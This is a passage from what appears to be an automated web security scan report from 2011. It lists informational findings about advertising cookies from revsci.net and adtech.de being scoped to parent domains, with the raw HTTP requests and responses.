VeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==; rsiPus_pcmJ="MLsXsqMOJjhv5pB0GuK8L0HP6TxvTJOb5RPKlFjCvxKBGnNieprsaqAEBSpAsXkCPkTX0nxsBiWalfewKcJK8Vc/VW9/VjSEysooOkVzr/RWSQ7o/SdsY9rD5Rran1cYTu5H2glQ6wiGGbe7BONawjupeQmuCxD6wLXUENWF0WHX0pHjFhiyz8iM1hcftVO/mv2Gym6f1ixYIEoxWjZmugIrdOCa6jtlrwynaN2daFJSG+cHccCyeSSyqxFOdB7JO2qgvGJDILfWUHh4m+MSIEwdZyOpUONprjPGRiDXeoV1GN0HGmkDh71ptqIE73Slzx2ocQ3YWHZlgdaSTx6N9Gq1RdiCIjiwCxNpfVfSbErbPGn574X+YJwM0jly8qtYbEd8z2azKrl1r8U2xmmJk1Ut6fe1GyCQFMttbbqeDiSzU461AonI7qdnrF2j/+PzRXsh1X7BAxKCpTl2svSiaq0tTDa0zhuGMZGUOWewfuXATBKa0+HjymcOZXXg8mGLSvVmp/jMUCL6Hycpp8Heq2GfkJqmKJgynAhhT77HToysfn9n/8XqrPP3HCthiRFLZpOOTnBksJffeZmXGUAidwIVT4k0/Gah9U7VbqpOtiSYCYU4Yc8shojQKKPyiHgobQdVoozcpIHrCRoDDB+YGYmEhaulfXopicXxpSijZkV5JDPVmCP0dTfIGUIXXlsIH4QLHr5ybR2AtT29aq9li+t5BiXsqfDEojsRMq/Ygtk6OJvRVFcPu1JfdimNHGlFu87wDQ49K/8wLu5+IjJD8Lia5fRfiCwHyzBRT0tHMUBiPA18FS0OXs+6XYjcEcKIV9D9ynNJiwVb1M8S0L4TrR9L+n8qMcNqdXcvWbUDRQlEyi+nuJrqeeMAqFO5lDH6Opqdvvtxg7VWa6OwiiotH1KPT8awCgQVj9uG6fuofnYz6+ZgvA3nQrZ75NA1GYyZQPCYKxogsGppT39axp+alRTT1DD3DgY+aTnrDH4/x+G6ec/46zILCP5wLT0IyYbruzQ3K1lN0PclKCIGZJV8wEDT67c3S5t+iXoDTDwE"; rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Trj7P+Kw7EY+8nG6l7281jI/Twsp6FvJuxkedavN124ASJwVH5lHOqaC4o2fHK9QkQegr9yV3a1uS0XBRr+UjUJn3jbPtGSbFgtYHM6diK2a0NjjkRkuTSEj1KpKAhX6AZ1R1E/1mhgQQAGO6Ey+i60pJwoxL3P90aEwTDtF60ZrAr2oVSSkT53eZtaPmd04KSPJCji5aopxLklNZS/GiatoZ2jphGx2z1EXHlaH+CR99JCv3peL4/lsLBtiSo+43CIgl+uX+ehgA5bfpaMyTvjWqfMxG+YXpRB7oJvzVfJ1hAJB1fCxIe3BSPIhvIXg5w61OSBX96dEvqaOfQgXdLrYKu2TTqz1r49jDR0udHJkV58ovuVKNAQzYsIUkpudNMqvuS5rii5vasRjCyBbjuTZUI+ke75OMy75W1xZVCyxCOZvMLmxTUJXbZV8GzCE7lMDc3+zvE5V5IvbS5CsrnTj6ybSguJ+omQctAgniJFUozrkBZ1OIl5GLrwquW4JyHLRLAASEkCIgrjlKwH+eTKuYt0xO6ZRLXFJLAYwbNouVUSKXdm1/7rLyVlyqAb6l32+WOPCnh2bleryXHWUjO5ptGRoXtN/XsvNR5nqF5qOnaE7QN47lsTZYheDGqu5vx/TX9i8WWYdAEea18RNQgalGMmpUnwkr0XJxxkS9pOZY+nMDWO9YPnqV4L1M+jNcOrMDy5W7bFAzGFtBsQLQxTBMB8CQhsjSXE8EFGWtYAGcqgQrWLcFUAHv2YstIikpMJAHTcpd//ChyQksxgwRI/xDTP/UX8sl81am2u/l72M+kC3NYxyLlqbMQygHhC5xbzBLAz8uP5C8vlPRfNyTcmE0bjY/a4mx+MRhAyxr6EbW0PRTjcT9i1HqlvgHmTxKMoWqoDQUrJL0iSjFdVid/A10rFa2odEqrwGdImt2VkyF2FkvhrMrEPZ+oemlCYh57OAQpLcngarZUVMEBAbLnzayJNE1icdui+MToGdBHC8eA7SXFoiWvid4PrK32gS7iye9h3wQDCsKNPfiEGx+afiTdHusAdAnDb8v9Rj1kslJs26tYCN4jl0bmJ1JpEKWFHZSQJ/T/aq+8F84c4uJ2mgjExwD8ib+0M+W0SZksWnH/1693rN6KkLzl4u+xkRT9q33JjB7wW0GsiI6E17aBu49cXOoC0HjIZBvQaM9rIoqtmgwjToNtIcg952Cbwvin7A2nXH2BvmVnx4ucA2Wvn0J8cV8hZZDNaDUTbY219bW1E/kMSjSTfnagaQoW1WXUJr21Bl5LZcARkW7d1ksv8v4X3BZps89ZMu/Vz+sNEuFQY4vL6GJK6YPH/0/l8sx1s4x7GPq1/skLvz121KrQObQeVNJb0CkKyIYPH5XBeDt3iXpMBeWLxrFuVx0g7ItcCA+baO+p4dVI0vQ9Zr+V+MRO5Exbcu/249PljXdXc7EPtp9D9+w=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pcmJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gdqU="MLsXrqMOJjhroJB0OsFGPziNFPNiuow9UdSaSv9RjdiZuXcB7hqs6EdLVaX9FhqxzXqzJywn1Cj9nLMFQzefSGFEY+rjaCpJRiAiYGi2DHp0tKU8XQcGSHbS+Dk+qovgQTwR+gpKV0oPK0JkzzcKhOF8o7uE6oO9qh80lZ7Xel6NGtgbwjrgJduiM51PaIPd2BJyFdQZAmkNyOhm5cP71nYVyV9KaVPcBA50HnoWW6+k3Dxhr0zTbpCBHUllWtx6aRVDYGeZk9K7ZL0hTHKvncsHLsCLYHCvmD5Ycv7VVDV00zYJINWzu3CPrbB4IYAjXW3vj4rsblu54yLA1Dc6Y6gCuHKV5SZsUi4uGiBdtBhhocEPOnIejFhsR3rbY6GJtx4ihgHWbiCsghdvgegfdGd/5qYgmedE5PSbM1ADhrKGZ3SCY44HJIJRGGazmJrBKNn5LEoHx4MRcKmq7CTYjhtBIgVi8n0cQcFNme1bNmPWFKcqoVnAUSJpJgBqXFQ5wx7qH4gDYPya9+buKMK9+ekcnzt54NYfTnI7jAxwnCpWq+kJd0Yw543TIHZ5i0gxUC/IPGc6mxdWiKg4RHEO3L0otALBdNCwOFAiSK1bdi0nXrtknR3MMXhwwfPIzPaLXM+akKWNJAIcSh4PhAOFvqTKuFuDqkb2jqtMxvBdfAVFP7NcbvzKM+3/uuiZWRcF2CeeJ+flWQpzF+qS4BrI4Dt7AUZJ2EeFM3hYFUuM+b7FSC9tA/os4G3yWCotYZVrGvo54nzTqbUBprWjuZeCEFOQrhk39gvmKqik9/KpfzR5MiU0uLqBg4fajyELacRAGLnVGj+B7iteW8WMZEjeKmXBe07ucZRi9DpGErPDw6oq7W48eIvXekP4IC+FWJCPqTlvpuRnGVHMAgc2N/10uzlwIFyZU8xlBrKB09h8MsfXUFU/XriyVQk0iV2aXQykGDbTt7wXEZjVdp8Bg+8v79AqGFZFXHkpC6EnFo3jp0YNfEdmA+TtNo4qTVSUwILsHfJ1xPZDLAcyQmTDKNHxhrA2TUZakdD+b7KfaafZcpU="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUM1Iz9DOAYU1O2uA3Nf1wgg9Trn7P8K47EY+8nGql72A9rNu/WP+Yp2mpPygxIFQc/rlHGwyyG/2blenQfm1l0Q/iLSAjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5Ym5SS9akNrDlJkuTSEn1IzCzNjTywhnuZUD6LuLDI3Ub7pnknRg6DioQwaQWBI/Va9H+E6oAGKDoOkdEsbTdiXG0YLDJupGOL941dnqjjKA/tKwUiQ7Bg46i/2PEgcQGrjtDE8cREmclCxlJWKsd/4kBe220QCtR33/i+YiYxNLl11a2NeHERuz0/wtyg4B7wVzAxIr328AFdyG3OqCrt9Bss8gOMdglG+O8aLkC+XqiolL2z3YHeAtnVDXa4KKw1We9htczQ58f1/MGFXbDVpPs6WVRGu3+d5TCcU7yxQ7gKSdcw2h8rucA3ek3ms9do7g2wGQ4IAl0I1cn81AaowmHyzYOIPg1PyT+l0xKJZCRqqjo5TgwgO+/kXhACxeQ4RidxA9oz43XdB0IlE4K2AJSfqvAUc58BhHAK7sr4HZCqkLhQZyPg6Ip8jRGVSo19MvkgnZBhVdfI7td9lONwXbAiqOv0dBu1WgT3NcllONTos4/mZzgzFRWAFJvLRjBK0+6yBKRT+jieyboOkO+4xVqmrO/Ar4c5d1VTwLfBUF6D0BbDF0v9in35Iyo5OFSjJEB/0iMLPUVwhg35239Pd2hGJqg3X4ChYj/9Jzu9JzDnHq7XGQrhxR8hKZ9JsITQzwaf5Xp6L8CNvTM00skMxn4v0QN7OGYbiYaTRjXbBUNsd2c1JMgWmRXYAtR85D+z9c0B+kkUwZJMx45+HuZTwl1h98Wq2Vi+88RWyLIdaA1uhqGjqUUcMk/8RcMY1ZZ7bVEpoFmKPNbbffta1Hulv8HmTh6N2aOHgQzAzNGsR/ASaN5OZRN8nlrQj/3mLqK3PdQk1JaD1suhpMvEv4Ws+llCQBn4hBGD95pgc9YrBnJuzbXkcZ2fl27dkzem+EToIdBHC8Zs7eTFoCWnuWAPo234gSrmyO9h3wUPisKJP/iEGx+ZfaTRHusAxojdHgBZPVWnLnRMX/rExKb/q4ZfNfP5NH51TLP2xA3CWZaUes4c4uanbkwKntqp+uPTxw5qcuNxucC7vSNbUDZ9Ta1LhiitrPGSUJ2Ecgzj2d3TweX8ooHTl1HAtb0MP+KOWuoiznt63sse8jznEqCjX17SaGm9KBL0GJkp8M48eGwyyDYKFz0T4ESopltkXESByivxh69cV+stDhcg/oSfXwJwaItp7vsYlaMKIcddAdFCTqStm6l0ZR/ZaptMbYpL+KDItRKCRg+ccHvfqWumbv3zd1vdAyvlbXrrVxrU+uOjODfHrD8UH59LhZ18ntVw6ZS1hK7sBKy7ylMiHbBXT1CLkbvZA3yEPXVaMMdZjWNwu+A71b+1/H++HXYjWpcXLYVJx244iFFdiwEgRlnZiXLKdra7LEUfrdN0fQYrx+BKmbzKrhCdqeEJcp09XrcwUjfKA"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 09 May 2011 14:00:32 GMT

GIF89a.............!.......,...........D..;

9.15. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH;cfp=1;rndc=130495000;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=213;misc=1304950001207 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adserver.adtech.de
Cookie: CfP=1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: application/x-javascript
Set-Cookie: JEB2=4DC7F3676E651A260C6EAF39F01058B1;expires=Wed, 8 May 2013 14:7:47 GMT;domain=adtech.de;path=/
Content-Length: 1897

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...

9.16. http://adserver.adtech.de/bind  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /bind

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bind?ckey1=cookiename1;cvalue1=cookievalue1;expiresDays=90;adct=text/html;misc=123&_=1304949672673 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Content-Type: text/html
Content-Length: 1
Set-Cookie: cookiename1=cookievalue1;expires=Sun, 7 Aug 2011 14:3:5